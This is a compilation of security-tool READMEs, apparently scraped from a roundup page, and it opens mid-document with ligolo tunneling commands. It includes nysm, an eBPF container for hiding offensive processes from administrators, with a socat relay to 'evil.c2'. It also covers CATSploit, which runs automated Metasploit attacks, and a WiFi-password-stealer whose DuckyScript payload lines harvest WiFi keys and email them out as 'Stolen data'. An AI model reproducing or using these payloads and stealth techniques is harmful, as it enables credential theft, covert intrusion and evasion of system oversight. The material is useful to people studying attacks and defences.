$ sudo ip route add 192.168.0.0/24 dev ligolo
Windows:
> netsh int ipv4 show interfaces
Idx MΓ©t MTU Γtat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo
> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
Start the tunnel on the proxy:
[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation
You can now access the 192.168.0.0/24 agent network from the proxy server.
$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the listener_add
command.
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!
On the proxy
:
$ nc -lvp 4321
When a connection is made on the TCP port 1234
of the agent, nc
will receive the connection.
This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the listener_list
command and stop them using the listener_stop [ID]
command:
[Agent : nchatelain@nworkstation] Β» listener_list
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Active listeners β
βββββ¬ββββββββββββββββββββββββββ¬βββββ ββββββββββββββββββββ¬βββββββββββββββββββββββββ€
β # β AGENT β AGENT LISTENER ADDRESS β PROXY REDIRECT ADDRESS β
βββββΌββββββββββββββββββββββββββΌβββββββββββββββββββββββββΌββββββββββββββββββββββββ& #9508;
β 0 β nchatelain@nworkstation β 0.0.0.0:1234 β 127.0.0.1:4321 β
βββββ΄ββββββββββββββββββββββββββ΄βββββββββββββββββββββββββ΄βββββββββββββββββββββββββ
[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.
On the agent side, no! Everything can be performed without administrative access.
However, on your relay/proxy server, you need to be able to create a tun interface.
You can easily hit more than 100 Mbits/sec. Here is a test using iperf
from a 200Mbits/s server to a 200Mbits/s connection.
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged
or -PE
to avoid false positives.
AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.
git clone https://github.com/redhuntlabs/antisquat
.pip install -r requirements.txt
..openai-key
and paste your chatgpt api key in there..godaddy-key
and paste your godaddy api key in there.blacklist.txt
. Type in a line-separated list of domains youβd like to ignore. Regular expressions are supported.python3.8 antisquat.py domains.txt
Letβs say youβd like to run antisquat on "flipkart.com".
Create a file named "domains.txt", then type in flipkart.com
. Then run python3.8 antisquat.py domains.txt
.
AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.
A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py
Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.
If you'd like to know more about the tool, make sure to check out our blog.
To know more about our Attack Surface
Management platform, check out NVADR.
Airgorah
is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.
It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.
β Don't forget to put a star if you like the project!
This software only works on linux
and requires root
privileges to run.
You will also need a wireless network card that supports monitor mode
and packet injection
.
The installation instructions are available here.
The documentation about the usage of the application is available here.
This project is released under MIT license.
If you have any question about the usage of the application, do not hesitate to open a discussion
If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request
A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning
Features
so the script is super fast at scanning many urls
quick tutorial & screenshots are shown at the bottom
project contribution tips at the bottom
Β
Installation
git clone https://github.com/Mr-Robert0/Logsensor.git
cd Logsensor && sudo chmod +x logsensor.py install.sh
pip install -r requirements.txt
./install.sh
Dependencies
Β
1. Multiple hosts scanning to detect login panels
python3 logsensor.py -f <subdomains-list>
python3 logsensor.py -f <subdomains-list> -t 50
python3 logsensor.py -f <subdomains-list> --login
2. Targeted SQLi form scanning
python logsensor.py -u www.example.com/login --sqli
python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
python logsensor.py -u www.example.com/login -s --inputname email
View help
python logsensor.py --help
usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]
optional arguments:
-u , --url Target URL (e.g. http://example.com/ )
-f , --file Select a target hosts list file (e.g. list.txt )
--proxy Proxy (e.g. http://127.0.0.1:8080)
-l, --login run only Login panel Detector Module
-s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
-n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
-t , --threads Number of threads (default 30)
-h, --help Show this help message and exit
TODO
A stealth post-exploitation container.
With the raise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: Would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of System Administrators, not only by hiding eBPF, but much more:
All these tools go blind to what goes through nysm. It hides:
Warning This tool is a simple demonstration of eBPF capabilities as such. It is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.
Β
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y
cd ./nysm/src/
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h
cd ./nysm/src/
make
nysm is a simple program to run before the intended command:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.
-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message
Run a hidden bash
:
./nysm bash
Run a hidden ssh
and remove ./nysm
:
./nysm -r ssh user@domain
Run a hidden socat
as a daemon and remove ./nysm
:
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.
To differentiate nysm events from the others, everything runs inside a seperated PID namespace.
bpftool
has some features nysm wants to evade: bpftool prog list
, bpftool map list
and bpftool link list
.
As any eBPF program, bpftool
uses the bpf()
system call, and more specifically with the BPF_PROG_GET_NEXT_ID
, BPF_MAP_GET_NEXT_ID
and BPF_LINK_GET_NEXT_ID
commands. The result of these calls is stored in the userspace address pointed by the attr
argument.
To overwrite uattr
, a tracepoint is set on the bpf()
entry to store the pointed address in a map. Once done, it waits for the bpf()
exit tracepoint. When bpf()
exists, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID
, bpf_attr.start_id
is replaced by bpf_attr.next_id
.
In order to hide specific IDs, it checks bpf_attr.next_id
and replaces it with the next ID that was not created in nysm.
Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().
Auditd receives its logs from recvfrom()
which stores its messages in a buffer.
If the message received was generated by a nysm process through audit_log_end(), it replaces the message length in its nlmsghdr
header by 0.
Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid()
PIDs from getdents64()
in /proc
by changing the length of the previous record.
As getdents64()
requires to loop through all its files, the eBPF instructions limit is easily reached. Therefore, nysm uses tail calls before reaching it.
Hiding sockets is a big word. In fact, opened sockets are already hidden from many tools as they cannot find the process in /proc
. Nevertheless, ss
uses socket()
with the NETLINK_SOCK_DIAG
flag which returns all the currently opened sockets. After that, ss
receives the result through recvmsg()
in a message buffer and the returned value is the length of all these messages combined.
Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.
These are collected from the connect()
and bind()
calls.
Even with the best effort, nysm still has some limitations.
Every tool that does not close their file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash
is running before top
, the processes will not show up. But, if another process is created from that bash
instance while top
is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.
Kernel logs: dmesg
and /var/log/kern.log
, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory!
will pop several times because of the eBPF verifier on nysm run.
Many traces written into files are left as hooking read()
and write()
would be too heavy (but still possible). For example /proc/net/tcp
or /sys/kernel/debug/tracing/enabled_functions
.
Hiding ss
recvmsg
can be challenging as a new socket can pop at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to switch place between the first one and the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket information with hardcoded values.
Running bpf()
with any kind of BPF_*_GET_NEXT_ID
flag from a nysm child process should be avoided as it would hide every non-nysm eBPF objects.
Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.
CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentesterβs skill) .
CATSploit automatically performs penetration tests in the following sequence:
Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.
Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.
Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.
Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.
CATSploit has the following prerequisites:
For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.
To install the latest version of CATSploit, please use the following commands:
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh
CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json
, the following fields should be modified for your environment.
(*) Adjust the number according to the specs of your machine.
To start the server, execute the following command:
$ python cats_server.py -c [CONFIG_FILE]
Next, prepare another console, start the client program, and initiate a connection to the server.
$ python catsploit.py -s [SOCKET_PATH]
After successfully connecting to the server and initializing it, the session will start.
_________ ___________ __ _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/
[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>
The client can execute a variety of commands. Each command can be executed with -h
option to display the format of its arguments.
usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...
positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}
options:
-h, --help show this help message and exit
I've posted the commands and options below as well for reference.
host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit
host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit
scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit
scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit
scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] targe t_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned
plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit
attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute
options:
-h, --help show this help message and exit
post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
op tions:
-h, --help show this help message and exit
reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit
exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit
In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.
catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
ββββββββββββ³βββββββββββββββββ³βββββββββββ³βββββββββββββββββββββββββββββββββββ³ββββββββ
β hostID β IP β Hostname β Platform β Pwned β
β‘ββββββ βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β attacker β 0.0.0.0 β kali β kali 2022.4 β True β
β h_exbiy6 β 192.168.0.10 β β Linux 3.10 - 4.11 β False β
β h_nhqyfq β 192.168.0.20 β β Microsoft Windows 7 SP1 β False β
ββββββββββββ΄ ββββββββββββββββ΄βββββββββββ΄βββββββββββββββββββββββββββββββββββ΄ββββββββ
catsploit> host detail h_exbiy6
ββββββββββββ³βββββββββββββββ³βββββββββββ³βββββββββββββββ³ββββββββ
β hostID β IP β Hostname β Platform β Pwned β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β h_exbiy6 β 192.168.0.10 β ubuntu β ubuntu 14.04 β False β
ββββββββββββ΄βββββββββββββββ΄βββββββββββ΄βββββββββββββββ΄β ββββββ
[IP address]
ββββββββββββββββ³βββββββββββ³βββββββ³βββββββββββββ
β ipv4 β ipv4mask β ipv6 β ipv6prefix β
β‘ββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β β β β
βββββββββββββ ββ΄βββββββββββ΄βββββββ΄βββββββββββββ
[Open ports]
ββββββββββββββββ³ββββββββ³βββββββ³ββββββββββββββ³βββββββββββββββ³βββββββββββββββββββββββββββββ
β ip β proto β port β service β product β version β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β tcp β 21 β ftp β ProFTPD β 1.3.5 β
β 192.168.0.10 β tcp β 22 β ssh β OpenSSH β 6.6.1p1 Ubuntu 2ubuntu2.10 β
β 192.168.0.10 β tcp β 80 β http β Apache httpd β 2.4.7 β
β 192.168.0.10 β tcp β 445 β netbios-ssn β Samba smbd β 3.X - 4.X β
β 192.168.0.10 β tcp β 631 β ipp β CUPS β 1.7 β
ββββββββββββββββ΄ββββββββ΄βββββββ΄ββββββββββββββ΄βββββββββββββββ΄βββββββββββββββββββββββββββββ
[Vulnerabilities]
ββββββββββββββββ³ββββββββ³βββββββ³ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ³βββββββββββββββββ
β ip β proto β port β vuln_name β cve β
β‘βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β tcp β 0 β TCP Timestamps Information Disclosure β N/A β
β 192.168.0.10 β tcp β 21 β FTP Unencrypted Cleartext Login β N/A β
β 192.168.0.10 β tcp β 22 β Weak MAC Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Encryption Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Host Key Algorithm(s) (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 80 β Test HTTP dangerous methods β N/A β
β 192.168.0.10 β tcp β 80 β Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check β CVE-2014-3704 β
β 192.168.0.10 β tcp β 80 β Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check β N/A β
β 192.168.0.10 β tcp β 80 β Sensitive File Disclosure (HTTP) β N/A β
β 192.168.0.10 β tcp β 80 β Unprotected Web App / Device Installers (HTTP) β N/A β
β 192.168.0.10 β tcp β 80 β Cleartext Transmission of Sensitive Information via HTTP β N/A β
β 192.168.0.10 β tcp β 80 β jQuery < 1.9.0 XSS Vulnerability β CVE-2012-6708 β
β 192.168.0.10 β tcp β 80 β jQuery < 1.6.3 XSS Vulnerability β CVE-2011-4969 β
β 192.168.0.10 β tcp β 80 β Drupal 7.0 Information Disclosure Vulnerability - Active Check β CVE-2011-3730 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2016-2183 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2016-6329 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2020-12872 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β CVE-2011-3389 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β CVE-2015-0204 β
ββββββββββββββββ΄ββββββββ΄βββββββ΄ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ΄βββ& #9472;βββββββββββββ
[Users]
βββββββββββββ³ββββββββ
β user name β group β
β‘ββββββββββββββββββββ©
βββββββββββββ΄ββββββββ
catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
βββββββββββββββ³βββββ ββββββββ³βββββββββββββββββ³ββββββββ³ββββββββ³ββββββββ³ββββββββββββββββββββββββββββββββ
β scenario id β src host ip β target host ip β eVc β eVd β steps β first attack step β
β‘ββββββββββββββββββββββββββββββββββββγ 3;ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 3d3ivc β 0.0.0.0 β 192.168.0.10 β 1.0 β 32.0 β 1 β exploit/multi/http/jenkins_sβ¦ β
β 5gnsvh β 0.0.0.0 β 192.168.0.10 β 1.0 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 6nlxyc β 0.0.0.0 β 192.168.0.10 β 0.0 β 48.32 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 8jos4z β 0.0.0.0 β 192.168.0.1 0 β 0.7 β 72.8 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 8kmmts β 0.0.0.0 β 192.168.0.10 β 0.0 β 32.0 β 1 β exploit/multi/elasticsearch/β¦ β
β agjmma β 0.0.0.0 β 192.168.0.10 β 0.0 β 24.0 β 1 β exploit/windows/http/manageeβ¦ β
β joglhf β 0.0.0.0 β 192.168.0.10 β 70.0 β 60.0 β 1 β auxiliary/scanner/ssh/ssh_loβ¦ β
β rmgrof β 0.0.0.0 β 192.168.0.10 β 100.0 β 32.0 β 1 β exploit/multi/http/drupal_drβ¦ β
β xuowzk β 0.0.0.0 β 192.168.0.10 β 0.0 β 24.0 β 1 β exploit/multi/http/struts_dmβ¦ β
β yttv51 β 0.0.0.0 β 192.168.0.10 β 0.01 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
β znv76x β 0.0.0.0 β 192.168.0.10 β 0.01 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
βββββββββββββββ΄ββββββββββββββ΄βββββββββββββββββ΄ββββββββ΄ββββββββ΄ββββββββ΄ββββββββββββββββββββββββββββββββ
catsploit> scenario detail rmgrof
βββββββββββββββ³βββββββββββββββββ³ββββββββ³βββββββ
β src host ip β target host ip β eVc β eVd β
β‘ββββββββββββββββββββββββββββββββββββββββββββββ©
β 0.0.0.0 β 192.168.0.10 β 100.0 β 32.0 β
βββββββββββββββ΄ββββββββ ββββββββ΄ββββββββ΄βββββββ
[Steps]
βββββ³ββββββββββββββββββββββββββββββββββββββββ³ββββββββββββββββββββββββ
β # β step β params β
β‘βββββββββββββββββββββββββββββββ ββββββββββββββββββββββββββββββββββββ©
β 1 β exploit/multi/http/drupal_drupageddon β RHOSTS: 192.168.0.10 β
β β β LHOST: 192.168.10.100 β
βββββ΄ββββββββββββββββββββββββββββββββββββββββ΄ββββββββββββββββββββββββ
catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!
catsploit> exit
Bye.
All informations and codes are provided solely for educational purposes and/or testing your own systems.
For any inquiry, please contact the email address as follows:
catsploit@nk.MitsubishiElectric.co.jp
Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.
Clone the Repository:
git clone https://github.com/spyboy-productions/Valid8Proxy.git
Navigate to the Directory:
cd Valid8Proxy
Install Dependencies:
pip install -r requirements.txt
Run the Tool:
python Valid8Proxy.py
Follow Interactive Prompts:
Save to File:
Check Results:
python Validator.py
Follow the prompts:
Enter the path to the file containing proxies (e.g., proxy_list.txt). Enter the number of proxies you want to validate. The script will then validate the specified number of proxies using multiple threads and print the valid proxies.
Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.
PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.
Features:
Usage:
proxies.txt
in this format 50.168.163.176:80
How to Use:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
pip3 install -r requirements.txt
python3 PhantomCrawler.py
Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.
Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.
Disclaimer: All content in this project is intended for security research purpose only.
Β
During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
Physical access to victim's computer.
Unlocked victim's computer.
Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.
Knowledge of victim's computer password for the Linux exploit.
Note:
It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.
However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.
The payload uses STRING
command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER
/SPACE
will simulate a press of keyboard keys.
We use DELAY
command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:
This approach was used for the Windows exploit. The whole payload can be seen here.
This approach was used for the Linux exploit. The whole payload can be seen here.
In order to use the Windows payload (payload1.dd
), you don't need to connect any jumper wire between pins.
Once passwords have been exported to the .txt
file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL
, SENDER_EMAIL
and yours email PASSWORD
. In addition, you could also update the body and the subject of the email.
STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587 |
ο Note:
After sending data over the email, the
.txt
file is deleted.You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.
Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.
In order to use the Linux payload (payload2.dd
) you need to connect a jumper wire between GND
and GPIO5
in order to comply with the code in code.py
on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.
Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK
with the name of your USB drive in two places.
STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt |
STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt |
In addition, you will also need to update the Linux PASSWORD
in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.
STRING echo PASSWORD | sudo -S echo |
STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')" |
In order to run the wifi_passwords_print.sh
script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
where PASSWORD
is your account's password and USBSTICK
is the name for your USB device.
NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style
keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep
command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)
). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).*
will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.
For more information about NetworkManager here is some useful links:
Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt
file.
WiFi-password-stealer/resources/wifi_pass.txt
Lines 1 to 5 in f5b3b11
Wireless_Network_Name Password | |
--------------------- -------- | |
WLAN1 pass1 | |
WLAN2 pass2 | |
WLAN3 pass3 |
One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND
) and pin 20 (GPIO15
). For more details visit this link.
ο‘ Tip:
- Upload your payload to RPi Pico before you connect the pins.
- Don't solder the pins because you will probably want to change/update the payload at some point.
When creating a functioning payload file, you can use the writer.py
script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.
python3 writer.py windows payload1.dd
This pico-ducky currently works only on Windows OS.
This attack requires physical access to an unlocked device in order to be successfully deployed.
The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.
Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.
Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.
The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.
Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.
If the Caps Lock
is ON, some of the payload code will not be executed and the exploit will fail.
If the computer has a non-English Environment set, this exploit won't be successful.
Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.
Caps Lock
